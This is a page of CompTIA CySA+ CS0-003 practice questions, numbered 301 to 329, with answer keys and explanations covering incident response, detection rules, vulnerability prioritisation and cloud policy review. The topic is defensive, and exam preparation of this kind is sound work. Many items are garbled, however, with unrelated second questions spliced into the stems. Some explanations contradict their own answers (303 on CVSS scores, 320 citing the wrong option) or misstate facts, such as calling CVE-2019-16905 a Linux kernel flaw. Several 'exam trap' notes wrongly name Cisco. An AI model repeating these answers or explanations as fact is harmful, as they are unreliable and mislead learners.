CompTIA CySA+ CS0-003 (CS0-003) — Questions 301375

503 questions total · 7pages · All types, answers revealed

Page 4

Page 5 of 7

Page 6
301
MCQmedium

An analyst has several malware samples from the same campaign and wants to detect related files based on unique strings and byte patterns. Which method is MOST appropriate? In the containment trade-off phase, Which response balances containment with evidence preservation?

A.Tune DHCP lease duration
B.Use only a firewall deny rule for port 443
C.Create a CVE entry
D.Create and test a YARA rule against known-good and known-bad samples
AnswerD

YARA rules are suitable for identifying malware families using file strings, byte sequences, and conditions.

Why this answer

YARA rules are specifically designed to identify and classify malware samples based on textual or binary patterns, including unique strings and byte sequences. By testing the rule against known-good and known-bad samples, the analyst can validate its accuracy and reduce false positives, making it the most appropriate method for detecting related files from the same campaign.

Exam trap

CompTIA often tests the distinction between detection methods (YARA) and containment or remediation actions (firewall rules, DHCP changes), leading candidates to confuse operational security controls with forensic analysis techniques.

How to eliminate wrong answers

Option A is wrong because tuning DHCP lease duration affects network address allocation and does not help in detecting malware based on strings or byte patterns. Option B is wrong because using only a firewall deny rule for port 443 blocks HTTPS traffic indiscriminately, which would not identify related malware files and could disrupt legitimate business operations. Option C is wrong because creating a CVE entry is a process for documenting a vulnerability, not a method for detecting or classifying malware samples based on unique patterns.

302
MCQeasy

In a regulated payment environment, a laptop may contain evidence for a legal investigation. What should the responder document during acquisition? During post-incident improvement, which decision is most defensible? which action best reduces risk without losing evidence?

A.Only the laptop colour
B.Only the ticket priority
C.Only the user's job title
D.Who collected it, when, where, hash values, transfer details, and storage location
AnswerD

Chain of custody records evidence handling and integrity from collection onward. In post-incident improvement, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because legal and regulatory requirements demand a complete chain of custody for digital evidence. Documenting who collected the laptop, when, where, hash values (e.g., SHA-256), transfer details, and storage location ensures the evidence is admissible and tamper-proof. This aligns with NIST SP 800-86 and ISO 27037 forensic best practices.

Exam trap

The trap here is that candidates may think minimal documentation (like color or job title) is sufficient, but Cisco tests that only a complete chain-of-custody record satisfies legal admissibility and regulatory compliance.

How to eliminate wrong answers

Option A is wrong because documenting only the laptop color provides no forensic value and fails to establish chain of custody or evidence integrity. Option B is wrong because recording only the ticket priority is irrelevant to evidence handling and does not capture any forensic metadata. Option C is wrong because noting only the user's job title omits critical details like collection time, location, and hash verification, making the evidence legally indefensible.

303
MCQhard

Based on the scan output, which vulnerability should be prioritized first for remediation?

A.CVE-2019-16905
B.CVE-2020-15778
C.CVE-2020-12060
D.Both A and B equally.
AnswerB

Highest CVSS score (9.8).

Why this answer

CVE-2020-15778 is a critical command injection vulnerability in OpenSSH's scp utility (CVE-2020-15778) that allows an unauthenticated remote attacker to execute arbitrary commands on the target system by crafting a malicious scp source path. This vulnerability has a CVSS score of 8.8 (High) and is remotely exploitable without authentication, making it the highest priority for remediation over the other listed CVEs.

Exam trap

CompTIA often tests the principle that remote code execution (RCE) vulnerabilities with no authentication requirement should always be prioritized over local privilege escalation or denial-of-service vulnerabilities, even if the latter have higher CVSS scores in some categories.

How to eliminate wrong answers

Option A is wrong because CVE-2019-16905 is a privilege escalation vulnerability in the Linux kernel's eBPF subsystem (bpf_skb_change_head) that requires local access to exploit, making it less critical than a remotely exploitable command injection. Option C is wrong because CVE-2020-12060 is a denial-of-service (DoS) vulnerability in the Linux kernel's NFSv4.2 implementation that requires specific conditions and only causes a system crash, not remote code execution. Option D is wrong because both A and C are not equally critical; CVE-2020-15778 is the only one that allows unauthenticated remote command execution, which is a higher severity and should be prioritized first.

304
MCQhard

A threat hunter wants a portable detection for suspicious rundll32 execution that can be converted for multiple SIEM platforms. Which artefact format best fits this goal? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

A.CVSS vector string
B.Sigma rule
C.OpenIOC package only
D.YARA rule
AnswerB

Sigma is designed as a generic detection-rule format that can be translated into SIEM-specific queries.

Why this answer

Sigma rules are the correct choice because they are a vendor-agnostic, YAML-based format designed specifically for writing detection logic that can be converted into multiple SIEM query languages (e.g., Splunk SPL, Elastic EQL, QRadar AQL). This portability directly meets the threat hunter's goal of creating a single detection for suspicious rundll32 execution that works across different SIEM platforms.

Exam trap

Cisco often tests the distinction between artifact formats (like OpenIOC) and detection rule formats (like Sigma), trapping candidates who confuse forensic artifact sharing with portable detection engineering.

How to eliminate wrong answers

Option A is wrong because CVSS vector strings describe vulnerability severity (e.g., CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) and are not used for detection logic or SIEM queries. Option C is wrong because OpenIOC packages are XML-based and primarily used for forensic artifact sharing in tools like Mandiant IOC Editor, but they are not as easily convertible across multiple SIEM platforms as Sigma rules, and they lack the standardized mapping to SIEM query languages that Sigma provides.

305
MCQmedium

During a post-compromise review, a developer accidentally committed a cloud access key to a public repository. Logs show the key was used from an unfamiliar IP. What should be done first? During eradication, which decision is most defensible? which action should be prioritized before closure?

A.Wait to see whether charges increase
B.Disable or rotate the key and review actions performed with it
C.Block the developer's laptop from Wi-Fi
D.Ask the developer to delete the commit only
AnswerB

The exposed credential must be invalidated and its use scoped through audit logs. In eradication, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option B is correct because the immediate priority is to invalidate the compromised credential (rotate or disable the key) to prevent further unauthorized access, and then review the actions performed with it to assess the scope of the breach. This aligns with the NIST SP 800-61 incident response lifecycle, specifically the containment phase, where stopping the attacker's access is paramount before eradication or closure.

Exam trap

Cisco often tests the distinction between containment and eradication, where candidates mistakenly choose an eradication step (like blocking a laptop) before completing the critical containment action of revoking the compromised credential.

How to eliminate wrong answers

Option A is wrong because waiting to see whether charges increase is a passive, reactive approach that allows the attacker continued access, potentially leading to more damage and higher costs; it violates the principle of immediate containment. Option C is wrong because blocking the developer's laptop from Wi-Fi addresses a non-issue (the developer's local network access) and does nothing to revoke the cloud access key that is already exposed and being used from an unfamiliar IP; it confuses endpoint security with credential compromise.

306
Multi-Selecthard

Which THREE activities are typically performed during the post-incident activity phase of the incident response lifecycle?

Select 3 answers
A.System restoration from backups.
B.Root cause analysis.
C.Implementation of new security awareness training.
D.Evidence retention for potential legal action.
E.Lessons learned meeting.
AnswersB, D, E

Identifying the root cause is a key post-incident activity.

Why this answer

Root cause analysis (B) is performed during the post-incident activity phase to identify the underlying vulnerability or misconfiguration that allowed the incident to occur. This analysis informs remediation steps and helps prevent recurrence, making it a core activity of this phase.

Exam trap

CompTIA often tests the distinction between recovery-phase actions (e.g., system restoration) and post-incident analysis activities, leading candidates to mistakenly include restoration as a post-incident task.

307
Multi-Selectmedium

A security analyst needs to communicate the findings of a penetration test to the IT operations team and the CISO. Which three of the following actions best support effective reporting and communication? (Choose three.)

Select 3 answers
.Customize the level of detail in the report for each audience
.Include raw command outputs and exploit code in the executive summary
.Prioritize findings based on risk to the organization’s mission
.Provide actionable remediation steps with ownership assignments
.Delay the report until all findings are fully verified with no uncertainty
.Submit the report as a confidential document without any verbal briefing

Why this answer

Customizing the level of detail for each audience ensures that technical teams receive the operational depth they need (e.g., raw findings, exploit paths) while executives get a high-level summary focused on business risk and strategic impact. This aligns with the principle of audience-aware reporting in penetration testing, where the CISO requires risk context and the IT operations team needs actionable technical details.

Exam trap

CompTIA often tests the misconception that including all raw technical data in the executive summary is thorough, when in fact it violates audience-specific communication best practices and can overwhelm non-technical readers.

308
MCQhard

A SIEM alert shows one workstation requesting a high number of Kerberos service tickets for many SPNs, followed by no corresponding service access. Which attack should be suspected?

A.Kerberoasting reconnaissance or ticket harvesting
B.DNS cache poisoning
C.Pass-the-hash using NTLM only
D.ARP spoofing
AnswerA

Unusual TGS-REQ volume across service principals can indicate Kerberoasting activity.

Why this answer

A high volume of Kerberos service ticket requests for many SPNs, followed by no actual service access, is characteristic of Kerberoasting reconnaissance. In this attack, an adversary with valid domain credentials requests TGS tickets for service accounts to extract the NTLM hash embedded in the ticket, which can then be cracked offline. The lack of subsequent service access confirms the tickets were obtained solely for offline brute-force cracking, not legitimate use.

Exam trap

Cisco often tests the distinction between reconnaissance (ticket harvesting without access) and actual exploitation; the trap here is confusing Kerberoasting with pass-the-ticket or golden ticket attacks, which involve ticket reuse or forgery rather than offline hash cracking.

How to eliminate wrong answers

Option B is wrong because DNS cache poisoning involves corrupting DNS resolver caches to redirect traffic to malicious IPs, which does not generate Kerberos TGS requests or SPN enumeration. Option C is wrong because pass-the-hash using NTLM only exploits NTLM authentication by reusing captured NTLM hashes to authenticate, not by requesting Kerberos service tickets; the described behavior specifically involves Kerberos AS-REQ/TGS-REQ traffic, not NTLM.

309
MCQhard

A security analyst reviews this S3 bucket policy. Which vulnerability is present?

A.Missing encryption
B.Cross-site scripting
C.Insecure direct object reference
D.Public read access to all objects
AnswerD

Principal '*' with Allow effect grants public access to all objects in the bucket.

Why this answer

The S3 bucket policy grants public read access to all objects via the `Principal: "*"` and `Action: "s3:GetObject"` statement. This means any unauthenticated user on the internet can list and download objects in the bucket, exposing sensitive data. The vulnerability is explicitly public read access, not missing encryption or application-layer flaws.

Exam trap

CompTIA often tests the distinction between a misconfigured access control policy (like public read) and other vulnerability types (like encryption or injection), so candidates mistakenly choose 'missing encryption' because they see a lack of security controls, but the policy itself does not address encryption at all.

How to eliminate wrong answers

Option A is wrong because missing encryption (e.g., server-side encryption not enforced) is a compliance or data-at-rest risk, but the policy shown does not disable encryption—it simply allows public reads. Option B is wrong because cross-site scripting (XSS) is a web application vulnerability involving injection of malicious scripts into web pages, not a misconfiguration in an S3 bucket policy. Option C is wrong because insecure direct object reference (IDOR) is an access control flaw where a user can access unauthorized resources by manipulating identifiers (e.g., object keys), but the policy here grants blanket public access to all objects, not a per-object IDOR issue.

310
MCQmedium

During a post-compromise review, a server suspected of running fileless malware is still powered on. Which evidence should be captured first if it is safe to do so? During detection and analysis, which decision is most defensible? which action should be prioritized before closure?

A.Volatile memory and active network/process state
B.Marketing screenshots
C.Archived monthly reports
D.The office seating plan
AnswerA

Fileless malware may reside in memory; volatile evidence disappears when the system is powered off. In detection and analysis, responders need action that reduces risk while preserving the investigation record.

Why this answer

In a post-compromise review of a server suspected of running fileless malware, volatile memory (RAM) and active network/process state must be captured first because fileless malware resides only in memory and leaves no persistent artifacts on disk. Capturing this evidence preserves the malware's code, running processes, network connections, and other transient data that would be lost on reboot or shutdown, enabling forensic analysis of the attack.

Exam trap

Cisco often tests the principle of order of volatility (OOV), where candidates mistakenly prioritize disk-based evidence over volatile memory, forgetting that fileless malware exists only in RAM and is destroyed on power loss.

How to eliminate wrong answers

Option B is wrong because marketing screenshots are irrelevant to forensic evidence collection and provide no technical data about fileless malware or system compromise. Option C is wrong because archived monthly reports are historical and non-volatile, containing no real-time process, memory, or network state needed to detect and analyze fileless malware that exists only in memory.

311
MCQhard

A cloud tenant shows an unusual spike in IAM policy changes, access key creation, and failed console logons from a new country. Which telemetry set gives the strongest evidence for control-plane compromise? In the alert triage phase, Which action gives the analyst the clearest next triage step?

A.Endpoint antivirus quarantine reports only
B.Packet captures from user laptops only
C.Cloud audit logs for identity, policy, and key-management API calls
D.Web server access logs from the public website
AnswerC

Control-plane attacks are best investigated through authoritative audit events that record who changed identity and access configuration.

Why this answer

Option C is correct because cloud audit logs (e.g., AWS CloudTrail, Azure Activity Log) capture control-plane API calls such as IAM policy changes, key creation, and authentication failures. These logs directly record the identity and resource management actions that indicate a compromise of the cloud management plane, whereas endpoint or network telemetry only reflects data-plane activity and cannot see API-level administrative actions.

Exam trap

The trap here is that candidates often confuse data-plane telemetry (endpoint AV, packet captures) with control-plane telemetry, failing to recognize that only cloud audit logs can capture administrative API calls like IAM policy changes and key creation.

How to eliminate wrong answers

Option A is wrong because endpoint antivirus quarantine reports only detect malware or file-based threats on individual devices; they cannot capture cloud control-plane API calls like IAM policy changes or access key creation. Option B is wrong because packet captures from user laptops only show network traffic at the data plane (e.g., HTTP, SSH sessions) and cannot log cloud management API requests that occur between the client and the cloud provider's control-plane endpoints.

312
MCQeasy

A vulnerability scan identifies a critical unauthenticated remote-code-execution flaw on an internet-facing VPN appliance that is actively exploited in the wild. Several internal-only medium vulnerabilities are also present. What should be remediated first? For control selection, Which control best addresses the stated weakness without hiding risk?

A.Patch or mitigate the VPN appliance immediately and verify exposure is removed
B.Remediate only low-risk internal findings to improve closure rate
C.Start with the oldest medium vulnerability
D.Defer all remediation until the monthly patch window
AnswerA

Internet exposure plus active exploitation makes this the highest-risk item despite other findings.

Why this answer

The VPN appliance's critical unauthenticated remote-code-execution flaw is actively exploited in the wild, posing an immediate and severe risk to the entire network perimeter. Remediating this first aligns with the vulnerability management principle of prioritizing by risk severity and exploitability, as an internet-facing device with a known active exploit bypasses all authentication controls and can lead to full compromise. Patching or mitigating it directly removes the exposure without obscuring the risk, unlike compensating controls that might hide the underlying weakness.

Exam trap

Cisco often tests the misconception that all vulnerabilities should be remediated in order of CVSS score alone, but here the trap is that candidates might choose a lower-severity internal finding because it is 'older' or 'easier to fix,' ignoring the criticality of an actively exploited, internet-facing RCE that demands immediate action regardless of other metrics.

How to eliminate wrong answers

Option B is wrong because focusing on low-risk internal findings to improve closure rate ignores the critical external threat; closure rate metrics are secondary to actual risk reduction, and this approach would leave the most dangerous vulnerability unaddressed. Option C is wrong because prioritizing by age (oldest medium vulnerability) disregards severity and active exploitation; a medium internal flaw, regardless of age, poses far less risk than a critical unauthenticated RCE on an internet-facing device that is already being exploited in the wild.

313
MCQeasy

A user opens an invoice document and shortly afterward the endpoint runs wscript.exe from the user's profile. Which detection logic is most relevant? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?

A.Office document spawning a script interpreter from a user context
B.Successful DHCP renewal
C.High CPU usage on the print server
D.A password expiry warning
AnswerA

Office-to-script process chains are common initial execution patterns for phishing payloads.

Why this answer

The correct detection logic is 'Office document spawning a script interpreter from a user context' because the scenario describes a classic malware execution chain: a user opens an invoice document (likely a malicious Office file with embedded macros or exploits), which then launches wscript.exe (a Windows Script Host interpreter) from the user's profile. This behavior is a strong indicator of a script-based attack, such as a macro virus or a downloader, and is directly relevant to detection engineering for endpoint security.

Exam trap

Cisco often tests the distinction between process-level behavioral detection (e.g., script interpreter spawned by Office) and unrelated system or network metrics, so candidates may mistakenly choose a generic performance or network event instead of recognizing the specific attack chain.

How to eliminate wrong answers

Option B is wrong because successful DHCP renewal is a routine network event that does not involve script execution or user-initiated document processing, and it would not generate noise relevant to the described attack chain. Option C is wrong because high CPU usage on the print server is a performance metric unrelated to endpoint script execution from an Office document, and it would not help detect or tune for the specific threat of wscript.exe being spawned from a user context.

314
Drag & Dropmedium

Order the steps for deploying a new security patch to a production environment.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

Patch deployment involves download/verification, testing, backup, rollout, and monitoring.

315
MCQeasy

Two servers have the same critical vulnerability. One hosts a public payment API; the other is a lab server isolated from production. What changes the remediation priority? For validation, Which action should be taken before closing or downgrading the finding?

A.Asset criticality, exposure, and business impact
B.The colour of the scanner dashboard
C.The number of installed fonts
D.Whether the hostname is shorter
AnswerA

The same CVE can represent different risk depending on where it exists and what the asset supports.

Why this answer

Remediation priority is determined by risk, which is a function of asset criticality, exposure, and business impact. The public payment API has high asset criticality (handles sensitive financial data), high exposure (accessible from the internet), and high business impact (breach could cause regulatory fines and revenue loss), whereas the isolated lab server has low exposure and minimal business impact. This aligns with the CVSS environmental score modifiers and NIST SP 800-30 risk assessment methodology.

Exam trap

Cisco often tests the misconception that all vulnerabilities with the same CVE should be patched with equal urgency, ignoring the criticality of the asset and its exposure to threats.

How to eliminate wrong answers

Option B is wrong because the colour of the scanner dashboard is a cosmetic UI element and has no bearing on risk-based prioritization; vulnerability management decisions must be data-driven, not based on visual indicators. Option C is wrong because the number of installed fonts is irrelevant to security posture or remediation priority; it does not affect exploitability, exposure, or business impact.

316
Multi-Selectmedium

A security analyst is preparing a post-incident report for a recent data breach. The report must be tailored for multiple audiences, including executive leadership, legal counsel, and the technical remediation team. Which four of the following best practices should the analyst follow to ensure effective communication and reporting? (Choose four.)

Select 4 answers
.Including a high-level executive summary with business impact and risk exposure for the C-suite.
.Providing detailed technical indicators of compromise (IOCs) and remediation steps for the technical team.
.Including legal hold notices and chain-of-custody documentation for legal counsel.
.Using a single, standardized report format for all stakeholders to ensure consistency.
.Omitting the root cause analysis to avoid liability concerns in the legal review.
.Adding a timeline of events and actions taken for the incident response team.

Why this answer

Including a high-level executive summary with business impact and risk exposure is correct because executive leadership requires a non-technical overview that focuses on financial, legal, and reputational consequences. This aligns with the NIST SP 800-61 Rev. 2 recommendation to tailor incident reports to the audience, ensuring the C-suite can make informed strategic decisions without being bogged down by technical details.

Exam trap

CompTIA often tests the misconception that a single standardized report is efficient, but the trap is that it ignores the distinct information needs of different stakeholders, leading to ineffective communication and potential compliance failures.

317
MCQeasy

A DAST scan cannot reach authenticated pages of a web application and reports only public content findings. What should be configured? For validation, Which action should be taken before closing or downgrading the finding?

A.Disable all application authentication
B.Treat absence of findings as proof of security
C.Authenticated scanning with a test account and session handling
D.Reduce the scan to only the landing page
AnswerC

DAST needs valid authentication and session management to test protected functionality.

Why this answer

DAST scanners require authenticated sessions to crawl and test pages behind login forms. Configuring authenticated scanning with a test account and proper session handling (e.g., cookie-based or token-based authentication) allows the scanner to maintain state and reach protected endpoints. Without this, the scanner only sees public content, missing vulnerabilities in authenticated areas.

Exam trap

Cisco often tests the misconception that disabling authentication or ignoring missing findings is acceptable, when the correct approach is to configure authenticated scanning to ensure comprehensive coverage of the attack surface.

How to eliminate wrong answers

Option A is wrong because disabling all application authentication would remove the security controls protecting sensitive pages, potentially exposing the application to unauthorized access and violating security requirements. Option B is wrong because treating the absence of findings as proof of security is a false sense of confidence; the scanner simply did not test the authenticated pages, so no conclusions about their security can be drawn.

318
MCQeasy

A vulnerability scan report shows a critical vulnerability on a web server with a CVSS score of 9.8. The IT manager wants to know the risk to the organization. Which of the following factors should the analyst consider FIRST?

A.The asset value and business criticality
B.The vendor's patch release schedule
C.The number of exploit attempts in the logs
D.The number of other vulnerabilities on the server
AnswerA

The impact of exploitation depends on how critical the server is.

Why this answer

The CVSS score of 9.8 indicates a critical severity vulnerability, but risk is a function of both severity and business context. The analyst must first assess the asset value and business criticality of the web server because a critical vulnerability on a non-essential server poses lower risk than the same vulnerability on a server handling sensitive data or core business processes. Without this context, the organization cannot prioritize remediation effectively.

Exam trap

CompTIA often tests the distinction between vulnerability severity (CVSS) and organizational risk, trapping candidates who confuse a high CVSS score with automatically high risk without considering asset context.

How to eliminate wrong answers

Option B is wrong because the vendor's patch release schedule is an operational consideration for remediation timing, not the primary factor for determining risk; risk assessment must first establish the impact on the organization. Option C is wrong because the number of exploit attempts in logs indicates current threat activity, but risk is evaluated based on potential impact and likelihood, not solely on observed attacks; a vulnerability with no current exploits can still pose high risk if the asset is critical. Option D is wrong because the number of other vulnerabilities on the server is irrelevant to the risk of this specific vulnerability; each vulnerability must be assessed independently based on asset criticality and exposure.

319
Multi-Selectmedium

A vulnerability management analyst is reviewing the results of an authenticated scan. The analyst identifies several medium-severity vulnerabilities that have been present for over a year. Which of the following are the best actions to take? (Choose two.)

Select 2 answers
A.Verify the vulnerabilities are still relevant by re-scanning.
B.Escalate to the asset owner for remediation.
C.Accept the risk if the system is no longer in use.
D.Remove the system from the network.
E.Increase the severity rating to high to ensure remediation.
AnswersA, B

Re-scanning confirms current status.

Why this answer

Option A is correct because re-scanning verifies whether the vulnerabilities are still present or have been remediated by other means (e.g., patching, configuration changes). Over a year, the environment may have changed, and the original scan results could be stale. An authenticated scan provides deeper visibility, but a fresh scan is the only way to confirm current relevance before taking further action.

Exam trap

CompTIA often tests the misconception that old vulnerabilities should automatically be escalated or reclassified, when in fact the first step is always to re-verify the finding with a current scan to avoid wasting resources on false positives or already-remediated issues.

320
MCQhard

An organization uses a SIEM with a rule that triggers when a user fails to authenticate five times within 10 minutes. Last night, the rule fired for a service account from an internal IP. What should be the first triage step?

A.Disable the service account immediately
B.Block the internal IP address at the firewall
C.Review the account's recent activity and correlate with system logs
D.Reset the service account password
AnswerC

Determines if failures are legitimate or malicious.

Why this answer

Option B is correct. The analyst should check the account's normal behavior; service accounts may have automated login attempts. Disabling could cause outages.

Blocking IP may be premature. Resetting password might lock out legitimate use.

321
MCQmedium

A network sensor must detect exploit traffic using packet payload signatures and generate alerts without blocking traffic. Which deployment is BEST? In the root-cause analysis phase, Which finding would most directly explain the activity?

A.A vulnerability scanner run once per quarter
B.Host-based file integrity monitoring only
C.Suricata or Snort in IDS mode on a monitored network tap or SPAN port
D.Inline IPS mode with drop rules for all signatures
AnswerC

IDS mode observes traffic and alerts on signatures while avoiding inline blocking impact.

Why this answer

Suricata or Snort in IDS mode on a monitored network tap or SPAN port is the correct deployment because it passively inspects packet payloads against exploit signatures without blocking traffic, generating alerts only. This matches the requirement for detection without inline blocking, as IDS mode operates out-of-band on a copy of the traffic.

Exam trap

Cisco often tests the distinction between IDS and IPS modes, where candidates mistakenly choose an inline IPS deployment (e.g., with iptables rules) because they assume detection requires blocking, but the question explicitly requires no blocking.

How to eliminate wrong answers

Option A is wrong because a vulnerability scanner run once per quarter is a periodic assessment tool that identifies system weaknesses, not a real-time network sensor that detects exploit traffic via packet payload signatures; it cannot generate alerts on live traffic. Option B is wrong because host-based file integrity monitoring only detects changes to files on a host, not network-level exploit payloads in packets; it lacks the ability to inspect network traffic payloads.

322
MCQhard

What is the net effect of the policy shown in the exhibit on requests from an IP address in the 10.0.0.0/8 range?

A.Allows all S3 actions from the 10.0.0.0/8 range and denies from other IPs.
B.Denies all S3 actions from all IP addresses.
C.Denies all S3 actions except GetObject from the 10.0.0.0/8 range.
D.Allows GetObject requests from the 10.0.0.0/8 range and denies all other S3 actions.
AnswerB

The Deny statement applies to all resources and does not have a condition, so it denies all actions on the bucket. The Allow is effectively overridden.

Why this answer

The exhibit shows an AWS S3 bucket policy with a Deny effect for all S3 actions (s3:*) from any IP address (the condition block uses a NotIpAddress condition with the value 10.0.0.0/8, meaning the deny applies to all IPs that are NOT in that range). However, because the policy explicitly denies all actions for all IPs not in 10.0.0.0/8, and there is no corresponding Allow statement for the 10.0.0.0/8 range, the net effect is that all S3 actions are denied from all IP addresses, including those in 10.0.0.0/8. This is because AWS IAM policies default to implicit deny, and an explicit deny overrides any allow, so without an explicit allow for the 10.0.0.0/8 range, the deny applies universally.

Exam trap

CompTIA often tests the misconception that a Deny statement with a NotIpAddress condition effectively allows traffic from the specified IP range, when in reality it only denies traffic from outside that range, and without an explicit Allow, all traffic is denied.

How to eliminate wrong answers

Option A is wrong because the policy does not contain an Allow statement for the 10.0.0.0/8 range; it only has a Deny statement that denies all S3 actions from IPs not in 10.0.0.0/8, which does not implicitly allow actions from that range. Option C is wrong because the policy denies all S3 actions (s3:*) without exception for GetObject, and there is no condition that would allow GetObject from any IP range. Option D is wrong because the policy does not allow GetObject from 10.0.0.0/8; it denies all S3 actions from IPs outside that range, but without an explicit allow, requests from 10.0.0.0/8 are also denied by default.

323
MCQhard

A SOC analyst notices a spike in outbound traffic from a server that normally only serves web pages. The signature-based IDS did not alert. What should the analyst do next?

A.Query threat intelligence for the destination IPs
B.Disable the server immediately
C.Check for zero-day vulnerabilities
D.Increase the IDS sensitivity threshold
AnswerA

Helps determine if traffic is malicious.

Why this answer

Querying threat intelligence for the destination IPs is the correct next step because the spike in outbound traffic from a web server suggests a potential data exfiltration attempt or command-and-control (C2) communication. Since the signature-based IDS did not alert, the traffic may be using non-standard ports or encrypted channels that evade known signatures. Threat intelligence can reveal if the destination IPs are associated with known malicious actors, botnets, or recent threat campaigns, providing context to determine if the traffic is benign or malicious.

Exam trap

CompTIA often tests the misconception that a signature-based IDS failing to alert means the traffic is safe, leading candidates to incorrectly choose increasing IDS sensitivity or checking for zero-days, rather than recognizing that the analyst must pivot to threat intelligence to identify unknown or evasive threats.

How to eliminate wrong answers

Option B is wrong because immediately disabling the server is a drastic, reactive measure that could disrupt legitimate services without first confirming malicious activity; a SOC analyst should investigate and contain, not blindly shut down. Option C is wrong because checking for zero-day vulnerabilities is premature and unrelated to the immediate symptom of outbound traffic spikes; zero-day checks are part of vulnerability management, not real-time traffic analysis. Option D is wrong because increasing the IDS sensitivity threshold would likely generate more false positives and does not address the root cause—the IDS missed the traffic because it was not signature-based, not because of sensitivity settings.

324
MCQhard

In a regulated payment environment, a user reports approving an unexpected OAuth consent prompt for an app named 'Invoice Reader'. The app now has mailbox read permissions. What should the incident responder do first? During detection and analysis, which decision is most defensible? which action best reduces risk without losing evidence?

A.Ignore it if MFA is enabled
B.Delete all emails from the mailbox
C.Only reset the user's Windows password
D.Revoke the app grant, review mailbox access, and identify other users who consented
AnswerD

OAuth consent abuse can persist without password access; revoking grants and scoping exposure contains the incident. In detection and analysis, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because the immediate priority is to revoke the malicious OAuth app grant to stop ongoing unauthorized access, then review the mailbox for any data exfiltration or tampering, and finally identify other users who may have consented to the same app to contain a broader compromise. This aligns with the NIST SP 800-61 incident response process for detection and analysis, where the most defensible decision is to remove the attacker's foothold while preserving evidence for forensic analysis. Revoking the grant directly addresses the OAuth consent attack vector, which bypasses traditional password-based controls and MFA.

Exam trap

Cisco often tests the misconception that MFA or password resets are sufficient to stop OAuth-based attacks, when in reality OAuth grants operate outside the authentication boundary and require explicit revocation of the app's permissions.

How to eliminate wrong answers

Option A is wrong because ignoring the incident despite MFA being enabled is a critical mistake — OAuth consent grants allow the app to access the mailbox without requiring the user's password or MFA, so MFA provides no protection against this type of attack. Option B is wrong because deleting all emails from the mailbox destroys potential evidence of data exfiltration, mailbox rules created by the attacker, or other indicators of compromise, violating the principle of preserving evidence during incident response. Option C is wrong because resetting the user's Windows password does not invalidate the OAuth access token or refresh token already issued to the malicious app; the app retains mailbox access via its own credentials, making the password reset ineffective.

325
MCQhard

A container workload unexpectedly starts a shell, mounts the host filesystem, and attempts outbound connections to an unknown IP. Which telemetry is MOST useful? In the evidence source phase, Which evidence source best supports or refutes the detection?

A.Only monthly vulnerability scan summaries
B.Only user password age reports
C.Only physical datacenter access logs
D.Container runtime events, Kubernetes audit logs, and network flow from the pod
AnswerD

Runtime, orchestration, and network telemetry together show process execution, privilege context, and external communication.

Why this answer

Container runtime events (e.g., from containerd or CRI-O) capture process spawns like an unexpected shell, Kubernetes audit logs record API calls that could indicate a compromised pod mounting the host filesystem, and network flow logs from the pod (e.g., via eBPF or Calico) reveal outbound connections to an unknown IP. Together, these three telemetry sources provide direct, real-time evidence of the three suspicious behaviors described, making them the most useful for detection and investigation.

Exam trap

CompTIA often tests the distinction between passive, periodic compliance artifacts (vulnerability scans, password reports) and active, real-time telemetry (runtime events, audit logs, network flows) that directly capture the sequence of malicious actions in a containerized environment.

How to eliminate wrong answers

Option A is wrong because monthly vulnerability scan summaries are point-in-time snapshots of known CVEs and cannot detect real-time anomalous behavior like a shell spawn, filesystem mount, or outbound connection. Option B is wrong because user password age reports are identity and access management artifacts unrelated to runtime container activity or network flows. Option C is wrong because physical datacenter access logs track human entry to facilities, not container-level process or network events, and cannot refute or support a workload compromise.

326
MCQhard

A security analyst is tasked with performing a risk assessment for a new web application. The application will handle sensitive customer data. Which of the following should the analyst do FIRST to identify vulnerabilities specific to the application?

A.Run a network vulnerability scan against the application server.
B.Perform a penetration test on the application.
C.Perform a source code review.
D.Conduct a threat model of the application.
AnswerD

Threat modeling identifies threats and vulnerabilities early.

Why this answer

Option C is correct because a threat model helps identify potential vulnerabilities early in the development lifecycle. Option A is wrong because a network scan is too broad. Option B is wrong because a penetration test is performed later.

Option D is wrong because a code review may be part of the process but threat modeling comes first.

327
Multi-Selectmedium

Which items help make a post-incident report useful for technical teams? (Choose two.)

Select 2 answers
A.Generic motivational slogans
B.Unrelated financial forecasts
C.Root cause and exploited control gaps
D.Specific remediation tasks with owners and validation steps
AnswersC, D

Technical teams need to know what failed.

Why this answer

Option C is correct because a post-incident report must include the root cause and exploited control gaps to enable technical teams to implement targeted remediation. Without identifying the specific vulnerability (e.g., unpatched CVE, misconfigured firewall rule, weak authentication mechanism) and the control failure that allowed the exploit, the report lacks actionable intelligence for hardening defenses.

Exam trap

Cisco often tests the misconception that a post-incident report should include broad business or motivational content, but the exam expects candidates to recognize that only technical, actionable details (like root cause and control gaps) are useful for remediation teams.

328
MCQmedium

A deception credential placed in a file share is used to authenticate to a server. No legitimate user should know the credential. What does this most likely indicate? In the containment trade-off phase, Which response balances containment with evidence preservation?

A.A scheduled password rotation completed successfully
B.The file share requires more storage capacity
C.Credential access or lateral movement activity that warrants high-priority investigation
D.The SIEM parser is always broken
AnswerC

Use of a honey credential is a high-fidelity signal because legitimate workflows should not touch it.

Why this answer

The presence of a deception credential in a file share that is used to authenticate to a server, with no legitimate user knowing it, strongly indicates that an attacker has discovered and used the credential to gain unauthorized access. This is a classic sign of credential access (stealing credentials) followed by lateral movement (using them to authenticate to another system). Such activity is a high-priority incident because it suggests the attacker has moved beyond initial compromise and is actively expanding their foothold, which requires immediate containment and investigation.

Exam trap

Cisco often tests the distinction between benign administrative actions (like password rotation) and malicious credential abuse; the trap here is that candidates may dismiss the credential usage as a routine operation rather than recognizing it as a high-priority indicator of compromise.

How to eliminate wrong answers

Option A is wrong because a scheduled password rotation completing successfully would not involve a credential that no legitimate user should know; password rotations are planned events that update credentials for authorized use, not create unknown credentials used for authentication. Option B is wrong because the file share requiring more storage capacity is a capacity planning issue unrelated to security events; it does not explain why a credential unknown to legitimate users is being used to authenticate to a server.

329
MCQhard

During forensic analysis of a compromised server, the analyst finds that the attacker deleted the system logs. Which data source is most likely to still contain relevant evidence?

A.Memory dump from before the attack
B.Endpoint detection and response (EDR) telemetry
C.Network flow logs
D.Backup tapes
AnswerB

